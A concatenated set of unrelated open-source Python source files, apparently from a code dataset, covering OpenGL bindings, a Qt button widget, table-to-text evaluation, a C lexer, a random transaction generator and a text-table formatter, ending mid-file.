def glReplacementCodeuiNormal3fVertex3fSUN(rc,nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glReplacementCodeuiNormal3fVertex3fvSUN(rc,n,v):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glReplacementCodeuiTexCoord2fColor4fNormal3fVertex3fSUN(rc,s,t,r,g,b,a,nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glReplacementCodeuiTexCoord2fColor4fNormal3fVertex3fvSUN(rc,tc,c,n,v):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glReplacementCodeuiTexCoord2fNormal3fVertex3fSUN(rc,s,t,nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glReplacementCodeuiTexCoord2fNormal3fVertex3fvSUN(rc,tc,n,v):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glReplacementCodeuiTexCoord2fVertex3fSUN(rc,s,t,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glReplacementCodeuiTexCoord2fVertex3fvSUN(rc,tc,v):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glReplacementCodeuiVertex3fSUN(rc,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLfloatArray)
def glReplacementCodeuiVertex3fvSUN(rc,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glTexCoord2fColor3fVertex3fSUN(s,t,r,g,b,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glTexCoord2fColor3fVertex3fvSUN(tc,c,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glTexCoord2fColor4fNormal3fVertex3fSUN(s,t,r,g,b,a,nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glTexCoord2fColor4fNormal3fVertex3fvSUN(tc,c,n,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glTexCoord2fColor4ubVertex3fSUN(s,t,r,g,b,a,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLubyteArray,arrays.GLfloatArray)
def glTexCoord2fColor4ubVertex3fvSUN(tc,c,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glTexCoord2fNormal3fVertex3fSUN(s,t,nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glTexCoord2fNormal3fVertex3fvSUN(tc,n,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glTexCoord2fVertex3fSUN(s,t,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray)
def glTexCoord2fVertex3fvSUN(tc,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glTexCoord4fColor4fNormal3fVertex4fSUN(s,t,p,q,r,g,b,a,nx,ny,nz,x,y,z,w):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glTexCoord4fColor4fNormal3fVertex4fvSUN(tc,c,n,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glTexCoord4fVertex4fSUN(s,t,p,q,x,y,z,w):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray)
def glTexCoord4fVertex4fvSUN(tc,v):pass
|
laed/dataset/__init__.py | jaywalnut310/NeuralDialog-LAED | 195 | 12652728 | <reponame>jaywalnut310/NeuralDialog-LAED
# @Time : 12/4/17 4:28 PM
# @Author : <NAME> |
polymetis/polymetis/python/polymetis/utils/data_dir.py | ali-senguel/fairo | 669 | 12652732 | # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import polymetis
PKG_ROOT_DIR = polymetis.__path__[0]
DATA_DIR = os.path.join(PKG_ROOT_DIR, "data")
def get_full_path_to_urdf(path: str):
"""Gets the absolute path to a relative path of :code:`DATA_DIR`."""
if not os.path.isabs(path):
path = os.path.abspath(os.path.join(DATA_DIR, path))
assert os.path.exists(path), f"Invalid robot_description_path: {path}"
return path
def which(program: str):
"""Equivalent of `which <https://en.wikipedia.org/wiki/Which_(command)>`_ program.
Taken from https://stackoverflow.com/a/377028
Returns equivalent of $(which program), or None
if unable to find it.
Args:
program: name of the executable to find.
"""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, _fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
|
nxt_editor/pixmap_button.py | Mikfr83/nxt_editor | 131 | 12652755 | <filename>nxt_editor/pixmap_button.py<gh_stars>100-1000
# External
from Qt import QtWidgets
from Qt import QtGui
from Qt import QtCore
class PixmapButton(QtWidgets.QAbstractButton):
"""https://stackoverflow.com/questions/2711033/how-code-a-image-button-in-pyqt"""
def __init__(self, pixmap, pixmap_hover, pixmap_pressed, pixmap_checked=None,
pixmap_checked_hover=None, pixmap_checked_pressed=None, size=32, checkable=False,
parent=None):
super(PixmapButton, self).__init__(parent=parent)
self.pixmap = pixmap
self.pixmap_hover = pixmap_hover
self.pixmap_pressed = pixmap_pressed
self.pixmap_checked = pixmap_checked
self.pixmap_checked_hover = pixmap_checked_hover
self.pixmap_checked_pressed = pixmap_checked_pressed
self.size = size
if checkable:
self.setCheckable(checkable)
self.pressed.connect(self.update)
self.released.connect(self.update)
self.action = None
def set_action(self, action):
self.action = action
# get properties
self.setToolTip(self.action.toolTip())
self.setWhatsThis(self.action.whatsThis())
# connect signals
action.triggered.connect(self.update_state)
action.toggled.connect(self.update_state)
if action.isCheckable():
self.toggled.connect(action.toggle)
else:
self.clicked.connect(action.trigger)
def update_state(self):
if self.action:
self.blockSignals(True)
self.setChecked(self.action.isChecked())
self.blockSignals(False)
def paintEvent(self, event):
if not isinstance(event, QtGui.QPaintEvent):
return
if self.isChecked():
pix = self.pixmap_checked_hover if self.underMouse() else self.pixmap_checked
if self.isDown():
pix = self.pixmap_checked_pressed
else:
pix = self.pixmap_hover if self.underMouse() else self.pixmap
if self.isDown():
pix = self.pixmap_pressed
painter = QtGui.QPainter(self)
painter.drawPixmap(event.rect(), pix)
del painter
def enterEvent(self, event):
self.update()
def leaveEvent(self, event):
self.update()
def sizeHint(self):
return QtCore.QSize(self.size, self.size) |
language/totto/prepare_references_for_eval.py | naveenjafer/language | 1,199 | 12652767 | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Processes references for eval (except for tokenization)."""
import json
import os
from absl import app
from absl import flags
from language.totto import table_to_text_utils
import six
FLAGS = flags.FLAGS
flags.DEFINE_string("input_path", None, "Input json file.")
flags.DEFINE_string("output_dir", None, "Output directory.")
flags.DEFINE_string("mode", None, "Either 'dev', or 'test'")
def get_references(json_example, mode="dev"):
"""Get references from json example."""
multi_reference = []
for annotation in json_example["sentence_annotations"]:
final_sentence = annotation["final_sentence"]
multi_reference.append(final_sentence)
if mode == "dev" or mode == "test":
while len(multi_reference) < 3:
multi_reference.append("<null>")
if mode == "dev" or mode == "test":
if json_example["overlap_subset"]:
multi_overlap_reference = multi_reference
multi_nonoverlap_reference = None
else:
multi_nonoverlap_reference = multi_reference
multi_overlap_reference = None
else:
multi_overlap_reference = None
multi_nonoverlap_reference = None
return multi_reference, multi_overlap_reference, multi_nonoverlap_reference
def get_parent_tables(json_example, mode="dev"):
"""Get tables in PARENT format for each json example."""
table = json_example["table"]
table_page_title = json_example["table_page_title"]
table_section_title = json_example["table_section_title"]
table_section_text = json_example["table_section_text"]
cell_indices = json_example["highlighted_cells"]
highlighted_subtable = (
table_to_text_utils.get_highlighted_subtable(
table=table, cell_indices=cell_indices))
# Get PARENT format code.
table_prec = table_to_text_utils.get_table_parent_format(
table=table,
table_page_title=table_page_title,
table_section_title=table_section_title,
table_section_text=table_section_text)
table_rec = table_to_text_utils.get_subtable_parent_format(
subtable=highlighted_subtable,
table_page_title=table_page_title,
table_section_title=table_section_title)
overlap_table_prec = None
overlap_table_rec = None
nonoverlap_table_prec = None
nonoverlap_table_rec = None
if mode == "dev" or mode == "test":
if json_example["overlap_subset"]:
overlap_table_prec = table_prec
overlap_table_rec = table_rec
else:
nonoverlap_table_prec = table_prec
nonoverlap_table_rec = table_rec
return (table_prec, table_rec, overlap_table_prec, overlap_table_rec,
nonoverlap_table_prec, nonoverlap_table_rec)
def write_references(references, output_path_base):
"""Write single and multiple references to file."""
# Just write a single reference file for now.
with open(output_path_base, "w", encoding="utf-8") as f:
for multi_reference in references:
f.write(multi_reference[0].lower() + "\n")
# Write out multireferences.
if FLAGS.mode == "dev" or FLAGS.mode == "test":
output_path_multi0 = output_path_base + "-multi0"
with open(output_path_multi0, "w", encoding="utf-8") as f:
for multi_reference in references:
f.write(multi_reference[0].lower() + "\n")
output_path_multi1 = output_path_base + "-multi1"
with open(output_path_multi1, "w", encoding="utf-8") as f:
for multi_reference in references:
f.write(multi_reference[1].lower() + "\n")
output_path_multi2 = output_path_base + "-multi2"
with open(output_path_multi2, "w", encoding="utf-8") as f:
for multi_reference in references:
f.write(multi_reference[2].lower() + "\n")
def write_table_parent_format(tables, output_path):
with open(output_path, "w", encoding="utf-8") as f:
for table in tables:
f.write(table.lower() + "\n")
def main(_):
input_path = FLAGS.input_path
output_dir = FLAGS.output_dir
all_references = []
overlap_references = []
nonoverlap_references = []
parent_prec_tables = []
parent_rec_tables = []
overlap_parent_prec_tables = []
overlap_parent_rec_tables = []
nonoverlap_parent_prec_tables = []
nonoverlap_parent_rec_tables = []
with open(input_path, "r", encoding="utf-8") as input_file:
for line in input_file:
line = six.ensure_text(line, "utf-8")
json_example = json.loads(line)
multi_reference, multi_overlap_reference, multi_nonoverlap_reference = (
get_references(json_example, FLAGS.mode))
all_references.append(multi_reference)
if multi_overlap_reference:
overlap_references.append(multi_overlap_reference)
if multi_nonoverlap_reference:
nonoverlap_references.append(multi_nonoverlap_reference)
(table_prec, table_rec, overlap_table_prec, overlap_table_rec,
nonoverlap_table_prec, nonoverlap_table_rec) = (
get_parent_tables(json_example, FLAGS.mode))
parent_prec_tables.append(table_prec)
parent_rec_tables.append(table_rec)
if overlap_table_prec and overlap_table_rec:
overlap_parent_prec_tables.append(overlap_table_prec)
overlap_parent_rec_tables.append(overlap_table_rec)
if nonoverlap_table_prec and nonoverlap_table_rec:
nonoverlap_parent_prec_tables.append(nonoverlap_table_prec)
nonoverlap_parent_rec_tables.append(nonoverlap_table_rec)
print("Writing references.")
all_output_path_base = os.path.join(output_dir, "references")
overlap_output_path_base = os.path.join(output_dir, "overlap_references")
nonoverlap_output_path_base = os.path.join(output_dir,
"nonoverlap_references")
write_references(all_references, all_output_path_base)
write_references(overlap_references, overlap_output_path_base)
write_references(nonoverlap_references, nonoverlap_output_path_base)
print("Writing tables in PARENT format.")
all_table_prec_path = os.path.join(output_dir,
"tables_parent_precision_format")
all_table_rec_path = os.path.join(output_dir, "tables_parent_recall_format")
overlap_table_prec_path = os.path.join(
output_dir, "overlap_tables_parent_precision_format")
overlap_table_rec_path = os.path.join(output_dir,
"overlap_tables_parent_recall_format")
nonoverlap_table_prec_path = os.path.join(
output_dir, "nonoverlap_tables_parent_precision_format")
nonoverlap_table_rec_path = os.path.join(
output_dir, "nonoverlap_tables_parent_recall_format")
write_table_parent_format(parent_prec_tables, all_table_prec_path)
write_table_parent_format(parent_rec_tables, all_table_rec_path)
write_table_parent_format(overlap_parent_prec_tables, overlap_table_prec_path)
write_table_parent_format(overlap_parent_rec_tables, overlap_table_rec_path)
write_table_parent_format(nonoverlap_parent_prec_tables,
nonoverlap_table_prec_path)
write_table_parent_format(nonoverlap_parent_rec_tables,
nonoverlap_table_rec_path)
if __name__ == "__main__":
flags.mark_flags_as_required(["input_path", "output_dir", "mode"])
app.run(main)
|
WebMirror/management/rss_parser_funcs/feed_parse_extractAlpenGlowTranslations.py | fake-name/ReadableWebProxy | 193 | 12652790 | def extractAlpenGlowTranslations(item):
"""
'Alpen Glow Translations'
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or 'preview' in item['title'].lower():
return None
tagmap = {
'<NAME>' : 'The Legend of the Concubine\'s Daughter Minglan',
}
for tag, sname in tagmap.items():
if tag in item['tags']:
return buildReleaseMessageWithType(item, sname, vol, chp, frag=frag)
return False |
pygears/lib/czip.py | bogdanvuk/pygears | 120 | 12652808 | <reponame>bogdanvuk/pygears
from pygears import module
from pygears.sim import delta
from pygears.typing import Queue, Tuple, typeof
from pygears import gear, alternative
from pygears.lib.shred import shred
from .ccat import ccat
from .permute import permuted_apply
from .cat_util import din_data_cat_value
from functools import reduce
from pygears.util.utils import gather
def lvl_if_queue(t):
if not issubclass(t, Queue):
return 0
else:
return t.lvl
def data_if_queue(t):
if not issubclass(t, Queue):
return t
else:
return t[0]
def zip_type(dtypes):
arg_queue_lvl = list(map(lvl_if_queue, dtypes))
base_type = Tuple[tuple(map(data_if_queue, dtypes))]
# If there are no Queues, i.e. max(arg_queue_lvl) == 0, the type below
# will resolve to just base_type
return Queue[base_type, max(arg_queue_lvl)]
@gear
async def zip_cat(*din) -> b'zip_type(din)':
id_max_lvl, max_lvl = max(enumerate(din),
key=lambda p: p[1].dtype.lvl if typeof(p[1].dtype, Queue) else 0)
async with gather(*din) as dout:
yield (din_data_cat_value(dout), dout[id_max_lvl].eot)
def isort(iterable, key=lambda x: x, reverse=False):
res = sorted(enumerate(iterable), key=key, reverse=reverse)
values = tuple(d[1] for d in res)
indices = tuple(d[0] for d in res)
return values, indices
@gear
def czip2(a, b) -> b'zip_type((a, b))':
return (a, b) | zip_sync(outsync=False) | zip_cat
@gear
def czip(*din):
if len(din) == 2:
return czip2(*din)
# Sort input interfaces in descending order of their Queue levels, i.e. we
# want to zip highest Queue levels first in order to synchronize them first
din_sorted_by_lvl, din_sort_indices = isort(din,
key=lambda x: lvl_if_queue(x[1].dtype),
reverse=True)
# Zip din's in sorted order using it as a binary operation. This will
# produce nested Tuple's, hence we cast it to a Queue of single Tuple
ret_flat_type = zip_type([d.dtype for d in din_sorted_by_lvl])
def czip_cascade(*din):
return reduce(czip, din) >> ret_flat_type
return permuted_apply(*din, f=czip_cascade, indices=din_sort_indices)
@gear
def unzip(din, *, dtypes):
zdata, zlast = din
def split():
for i, d in enumerate(dtypes):
data = zdata[i]
if issubclass(d, Queue):
yield ccat(data, zlast[:d.lvl]) | Queue[data.dtype, d.lvl]
else:
yield data
return tuple(split())
@gear(enablement=b'len(din) == 2')
async def zip_sync(*din, outsync=True) -> b'din':
lvls = tuple(d.dtype.lvl if typeof(d.dtype, Queue) else 0 for d in din)
overlap_lvl = min(lvls)
eot_aligned = (1, 1)
while (1):
din_data = [(await d.pull()) for d in din]
if overlap_lvl > 0:
eot_overlap = [d.eot[:overlap_lvl] for d in din_data]
eot_aligned = (eot_overlap[0] >= eot_overlap[1], eot_overlap[1] >= eot_overlap[0])
else:
eot_aligned = (1, 1)
eot_overlap = din_data[0].eot if lvls[0] else din_data[1].eot
if all(eot_aligned):
yield din_data
else:
await delta()
for d, aligned in zip(din, eot_aligned):
if (not aligned) or all(eot_aligned):
d.ack()
@alternative(zip_sync)
@gear(enablement=b'len(din) > 2')
def zip_sync_vararg(*din):
return din | czip | unzip(dtypes=[d.dtype for d in din])
@gear
def zip_sync_with(sync_in, din, *, balance=None):
if balance:
sync_in = sync_in | balance
din_sync, sync_in_sync = zip_sync(din, sync_in)
sync_in_sync | shred
return din_sync
@gear
def zip_wrap_with(sync, din):
din_zip = czip(sync, din)
return ccat(din_zip['data'][1], din_zip['eot']) | Queue
|
pkgs/tools/yasm/src/tools/python-yasm/pyxelator/lexer.py | manggoguy/parsec-modified | 2,151 | 12652832 | #!/usr/bin/env python
""" cdecl.py - parse c declarations
(c) 2002, 2003, 2004, 2005 <NAME> <<EMAIL>>
Released under GNU LGPL license.
version 0.xx
"""
import sys
import string
import types
import copy
#from cparse import BasicType, Qualifier, StorageClass, Typedef, Ellipses, GCCBuiltin
#from cparse import *
import cparse as host
class LexError(Exception):
pass
class Lexer(object):
def __init__(self,s="",verbose=0,**kw):
self.verbose = verbose
self.lookup = {} # a map for keywords and typedefs
for t in \
"float double void char int".split():
self.lookup[t] = host.BasicType( t )
for t in \
"register signed unsigned short long const volatile inline".split(): # inline here ???
self.lookup[t] = host.Qualifier( t )
for t in "extern static auto".split():
self.lookup[t] = host.StorageClass( t )
self.lookup['typedef'] = host.Typedef()
#self.lookup['__inline__'] = host.GCCBuiltin('__inline__')
#self.lookup['__extension__'] = host.Qualifier('__extension__')
self.lookup['...'] = host.Ellipses()
if s:
self.lex(s)
for key in kw.keys():
self.__dict__[key] = kw[key]
def lex(self,s):
self.stack = None
self.lines = s.splitlines()
self.set_state("","",0,0)
self.so_file = ""
self._newline()
self.get_token() # start
def mktypedef(self,tok,node):
if self.verbose:
print "%s.mktypedef(%s,%s)"%(self,tok,node)
self.lookup[ tok ] = node
def rmtypedef(self,tok):
" used in round trip testing "
# print "# rmtypedef(%s)"%tok
assert isinstance( self.lookup[ tok ], host.Node ) # existance
del self.lookup[ tok ]
def _get_kind(self,tok):
#print '_get_kind(%s)'%tok,self.lookup
try:
return self.lookup[tok]
#return self.lookup[tok].clone()
except KeyError:
if tok.startswith("__builtin"):
node = host.GCCBuiltin(tok)
self.lookup[tok] = node
return node
#elif tok in ( "__extension__", ):
#node = GCCBuiltin(tok)
#self.lookup[tok] = node
#return node
return None
def _newline(self):
while self.lno < len(self.lines):
line = self.lines[self.lno]
if not line or line[0] != "#":
break
l = line.split('"')
assert len(l)>=2
self.so_file = l[1]
#self.so_lno = int( l[0].split()[1] )
#sys.stderr.write("# %s %s: %s\n"%(so_lno,so_file,l))
self.lno+=1
def get_brace_token( self ):
self.push_state()
ident_chars0 = string.letters+"_"
ident_chars1 = string.letters+string.digits+"_"
tok, kind = "", ""
while self.lno < len(self.lines):
s = self.lines[self.lno]
i=self.col
while i < len(s):
if s[i] not in '{}':
i=i+1
continue
else:
tok = s[i]
kind = tok
self.col = i+1
break
# keep moving
#sys.stderr.write( "lexer ignoring '%s'\n"%s[i] )
i=i+1
if i==len(s):
# nothing found
assert tok == ""
self.col=0
self.lno+=1
self._newline()
else:
assert tok
break
self.set_state(tok,kind,self.lno,self.col)
def get_token(self):
self.push_state()
ident_chars0 = string.letters+"_"
ident_chars1 = string.letters+string.digits+"_"
tok, kind = "", ""
while self.lno < len(self.lines):
s = self.lines[self.lno]
i=self.col
while i < len(s):
if s[i].isspace():
i=i+1
continue
#if s[i] in ident_chars0:
if s[i].isalpha() or s[i]=='_':
# identifier
j=i+1
while j<len(s):
if s[j] in ident_chars1:
j=j+1
else:
break
tok = s[i:j]
self.col = j
kind = self._get_kind(tok)
break
if s[i].isdigit() or \
(i+1<len(s) and s[i] in '+-.' and s[i+1].isdigit()):
# number literal
is_float = s[i]=='.'
is_hex = s[i:i+2]=='0x'
if is_hex:
i=i+2
assert s[i].isdigit() or s[i] in "abcdefABCDEF", self.err_string()
j=i+1
while j<len(s):
#print "lex ",repr(s[i]),is_float
if s[j].isdigit() or (is_hex and s[j] in "abcdefABCDEF"):
j=j+1
elif s[j]=='.' and not is_float:
assert not is_hex
j=j+1
is_float=1
else:
break
tok = s[i:j]
self.col = j
if is_float:
kind = float(tok)
elif is_hex:
kind = int(tok,16)
else:
kind = int(tok)
break
if s[i:i+3]=='...':
# ellipses
#sys.stderr.write( "ELLIPSES "+str(self.get_state()) )
tok = s[i:i+3]
kind = self._get_kind(tok)
self.col = i+3
break
if s[i] in '*/{}()[]:;,=+-~.<>|&':
tok = s[i]
kind = tok
self.col = i+1
break
if s[i] == "'":
j = i+2
while j<len(s) and s[j]!="'":
j+=1
if j==len(s):
raise LexError( self.err_string() + "unterminated char constant" )
tok = s[i:j+1]
self.col = j+1
kind = s[i:j+1]
break
# keep moving
#sys.stderr.write( "lexer ignoring '%s'\n"%s[i] )
sys.stderr.write( "lexer ignoring '%s' lno=%d\n"%(s[i],self.lno+1) )
i=i+1
# end while i < len(s)
if i==len(s):
# nothing found, go to next line
assert tok == ""
self.col=0
self.lno+=1
self._newline()
else:
# we got one
assert tok
break
# end while self.lno < len(self.lines):
self.set_state(tok,kind,self.lno,self.col)
def err_string(self):
"Return helpful error string :)"
return self.lines[self.lno]+"\n"+" "*self.col+"^\n"
def push_state(self):
self.stack = self.get_state() # a short stack :)
#self.stack.push( self.get_state() )
def unget_token(self):
assert self.stack is not None
self.set_state(*self.stack)
self.stack = None
def set_state(self,tok,kind,lno,col):
if self.verbose:
print "tok,kind,lno,col = ",(tok,kind,lno,col)
self.tok = tok
self.kind = kind
self.lno = lno # line
self.col = col # column
def get_state(self):
return self.tok,self.kind,self.lno,self.col
def get_file(self):
return self.so_file
###################################################################
#
###################################################################
#
|
general/detect-fraudulent-transactions/transactions.py | caesarcc/python-code-tutorials | 1,059 | 12652838 | <filename>general/detect-fraudulent-transactions/transactions.py
from random import choices, randint
from string import ascii_letters, digits
account_chars: str = digits + ascii_letters
def _random_account_id() -> str:
"""Return a random account number made of 12 characters"""
return "".join(choices(account_chars,k=12))
def _random_amount() -> float:
"""Return a random amount between 1.00 and 1000.00"""
return randint(100,1000000)/100
def create_random_transaction() -> dict:
"""Create a fake randomised transaction."""
return {
"source":_random_account_id()
,"target":_random_account_id()
,"amount":_random_amount()
,"currency":"EUR"
} |
table_base.py | akrabat/SublimeTableEditor | 313 | 12652854 | # table_base.py - Key classes and methods for pretty print text table.
# Copyright (C) 2012 Free Software Foundation, Inc.
# Author: <NAME>
# Package: SublimeTableEditor
# Homepage: https://github.com/vkocubinsky/SublimeTableEditor
# This file is part of SublimeTableEditor.
# SublimeTableEditor is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# SublimeTableEditor is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with SublimeTableEditor. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
from __future__ import division
import math
import re
import csv
try:
from . import table_line_parser as tparser
from .widechar_support import wlen, wcount
except ValueError:
import table_line_parser as tparser
from widechar_support import wlen, wcount
class TableConfiguration:
def __init__(self):
self.keep_space_left = False
self.align_number_right = True
self.detect_header = True
self.intelligent_formatting = True
#only for simple syntax
self.hline_out_border = None
self.hline_in_border = None
self.custom_column_alignment = True
class TableSyntax:
def __init__(self, name, table_configuration):
self.name = name
self.table_configuration = table_configuration or TableConfiguration()
self.align_number_right = self.table_configuration.align_number_right
self.detect_header = self.table_configuration.detect_header
self.keep_space_left = self.table_configuration.keep_space_left
self.intelligent_formatting = self.table_configuration.intelligent_formatting
self.line_parser = tparser.LineParserPlus("(?:[|])")
# Must be set in sublass constructor
self.table_parser = None
self.table_driver = None
class Column(object):
ALIGN_LEFT = 'left'
ALIGN_RIGHT = 'right'
ALIGN_CENTER = 'center'
def __init__(self, row):
self.row = row
self.table = row.table
self.syntax = row.table.syntax
self.col_len = 0
self.align = None
self.header = None
self.colspan = 1
self.rowspan = 1
self.pseudo_columns = []
self.left_border_text = '|'
self.right_border_text = '|'
def min_len(self):
raise NotImplementedError
def render(self):
raise NotImplementedError
def align_follow(self):
return None
def pseudo(self):
return False
class PseudoColumn(Column):
def __init__(self, row, master_column):
Column.__init__(self, row)
self.master_column = master_column
self.data = ''
def render(self):
return ''
def min_len(self):
return self.master_column.min_len()
def pseudo(self):
return True
class Row:
def __init__(self, table):
self.table = table
self.syntax = table.syntax
self.columns = []
def __getitem__(self, index):
return self.columns[index]
def __len__(self):
return len(self.columns)
def is_header_separator(self):
return False
def is_separator(self):
return False
def is_data(self):
return False
def is_align(self):
return False
def append(self, column):
self.columns.append(column)
for i in range(0, column.colspan - 1):
psedo_column = PseudoColumn(self, column)
column.pseudo_columns.append(psedo_column)
self.columns.append(psedo_column)
def new_empty_column(self):
raise NotImplementedError
def create_column(self, text):
raise NotImplementedError
def render(self):
r = ""
for ind, column in enumerate(self.columns):
if column.pseudo():
continue
if ind == 0:
r += self.convert_border(column.left_border_text)
r += column.render()
r += self.convert_border(column.right_border_text)
return r
def convert_border(self, border_text):
# if separator converts to data
return border_text.replace('+', '|')
class DataRow(Row):
def new_empty_column(self):
return DataColumn(self, '')
def create_column(self, text):
return DataColumn(self, text)
def is_data(self):
return True
class DataColumn(Column):
def __init__(self, row, data):
Column.__init__(self, row)
self.data = data
self.left_space = ' '
self.right_space = ' '
def _norm(self):
if self.syntax.keep_space_left:
if self.header:
norm = self.data.strip()
else:
norm = self.data.rstrip()
if norm[:1] == ' ':
norm = norm[1:]
else:
norm = self.data.strip()
return norm
def min_len(self):
return int(math.ceil(self.total_min_len()/self.colspan))
def total_min_len(self):
# min of ' ' or ' xxxx '
space_len = len(self.left_space) + len(self.right_space)
total_min_len = max(space_len + 1, wlen(self._norm()) + space_len)
total_min_len = (total_min_len
+ (len(self.left_border_text) - 1)
+ (len(self.right_border_text) - 1))
return total_min_len
def render(self):
# colspan -1 is count of '|'
total_col_len = (self.col_len
+ (self.colspan - 1)
+ sum([col.col_len for col in self.pseudo_columns]))
#if self.syntax.multi_markdown_syntax():
# total_col_len = total_col_len - (self.colspan - 1)
total_col_len = (total_col_len
# left border already calculated
# - (len(self.left_border_text) - 1)
- (len(self.right_border_text) - 1))
norm = self._norm()
space_len = len(self.left_space) + len(self.right_space)
total_align_len = total_col_len - wcount(norm)
if self.header and self.syntax.detect_header:
align_value = norm.center(total_align_len - space_len, ' ')
elif self.align == Column.ALIGN_RIGHT:
align_value = norm.rjust(total_align_len - space_len, ' ')
elif self.align == Column.ALIGN_CENTER:
align_value = norm.center(total_align_len - space_len, ' ')
else:
align_value = norm.ljust(total_align_len - space_len, ' ')
return self.left_space + align_value + self.right_space
def check_condition(condition, message):
if not condition:
raise TableException(message)
class TextTable:
def __init__(self, syntax):
self.syntax = syntax
self.prefix = ""
self.rows = []
self.pack()
def __len__(self):
return len(self.rows)
def empty(self):
return len(self.rows) == 0
def __getitem__(self, index):
return self.rows[index]
def _max_column_count(self):
return max([len(row) for row in self.rows])
def _rstrip(self):
if len(self.rows) <= 1:
return
max_column_count = self._max_column_count()
long_lines_count = 0
long_line_ind = 0
for row_ind, row in enumerate(self.rows):
if len(row) == max_column_count:
long_lines_count += 1
long_line_ind = row_ind
if long_lines_count == 1:
row = self.rows[long_line_ind]
overspans = sum([column.colspan - 1 for column in row.columns])
if row.is_data() and overspans > 0:
shift = 0
for shift, column in enumerate(row[::-1]):
if column.pseudo() or len(column.data.strip()) > 0:
break
if shift > 0:
if len(self.rows) == 2:
if shift != overspans:
return
row.columns = row.columns[:-shift]
def pack(self):
if len(self.rows) == 0:
return
column_count = self._max_column_count()
if column_count == 0:
self.rows = []
return
#intelligent formatting
if self.syntax.intelligent_formatting:
self._rstrip()
column_count = self._max_column_count()
#adjust/extend column count
rowspans = [0] * column_count
for row in self.rows:
overcols = sum([rowspan for rowspan in rowspans if rowspan > 0])
